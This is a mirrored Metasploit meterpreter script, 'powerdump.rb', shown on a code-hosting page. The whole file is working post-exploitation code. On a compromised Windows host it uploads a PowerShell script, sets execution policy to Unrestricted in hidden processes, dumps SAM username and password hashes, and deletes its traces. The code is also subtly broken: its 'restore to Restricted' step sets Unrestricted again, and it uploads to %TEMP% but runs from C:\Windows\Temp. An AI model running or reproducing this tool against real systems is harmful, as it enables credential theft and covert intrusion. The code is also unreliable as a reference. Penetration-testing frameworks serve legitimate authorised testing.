Mirror of metasploit
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

powerdump.rb 2.7KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869
  1. ##
  2. # WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
  3. # If you'd like to improve this script, please try to port it as a post
  4. # module instead. Thank you.
  5. ##
  6. #
  7. # Meterpreter script for utilizing purely PowerShell to extract username and password hashes through registry
  8. # keys. This script requires you to be running as system in order to work properly. This has currently been
  9. # tested on Server 2008 and Windows 7, which install PowerShell by default.
  10. #
  11. # Script and code written by: Kathy Peters, Joshua Kelley (winfang), and David Kennedy (rel1k)
  12. #
  13. # Special thanks to Carlos Perez for the template from GetCounterMeasures.rb
  14. #
  15. # Script version 0.0.1
  16. #
  17. session = client
  18. @@exec_opts = Rex::Parser::Arguments.new(
  19. "-h" => [ false, "Help menu." ]
  20. )
  21. def usage
  22. print_line("PowerDump -- Dumping the SAM database through PowerShell")
  23. print_line("Dump username and password hashes on systems that have")
  24. print_line("PowerShell installed on the system. Win7 and 2008 tested.")
  25. print(@@exec_opts.usage)
  26. raise Rex::Script::Completed
  27. end
  28. #-------------------------------------------------------------------------------
  29. # Actual Hashdump here
  30. def dumphash(session)
  31. path = File.join( Msf::Config.data_directory, "exploits", "powershell" )
  32. print_status("Running PowerDump to extract Username and Password Hashes...")
  33. filename=("#{rand(100000)}.ps1")
  34. hash_dump=("#{rand(100000)}")
  35. session.fs.file.upload_file("%TEMP%\\#{filename}","#{path}/powerdump.ps1")
  36. print_status("Uploaded PowerDump as #{filename} to %TEMP%...")
  37. opmode = ""
  38. print_status("Setting ExecutionPolicy to Unrestricted...")
  39. session.sys.process.execute("powershell Set-ExecutionPolicy Unrestricted", nil, {'Hidden' => 'true', 'Channelized' => true})
  40. print_status("Dumping the SAM database through PowerShell...")
  41. session.sys.process.execute("powershell C:\\Windows\\Temp\\#{filename} >> C:\\Windows\\Temp\\#{hash_dump}", nil, {'Hidden' => 'true', 'Channelized' => true})
  42. sleep(10)
  43. hashes=session.fs.file.new("%TEMP%\\#{hash_dump}", "rb")
  44. begin
  45. while ((data = hashes.read) != nil)
  46. data=data.strip
  47. print_line(data)
  48. end
  49. rescue EOFError
  50. ensure
  51. hashes.close
  52. end
  53. print_status("Setting Execution policy back to Restricted...")
  54. session.sys.process.execute("powershell Set-ExecutionPolicy Unrestricted", nil, {'Hidden' => 'true', 'Channelized' => true})
  55. print_status("Cleaning up after ourselves...")
  56. session.sys.process.execute("cmd /c del %TEMP%\\#{filename}", nil, {'Hidden' => 'true', 'Channelized' => true})
  57. session.sys.process.execute("cmd /c del %TEMP%\\#{hash_dump}", nil, {'Hidden' => 'true', 'Channelized' => true})
  58. end
  59. print_status("PowerDump v0.1 - PowerDump to extract Username and Password Hashes...")
  60. dumphash(session)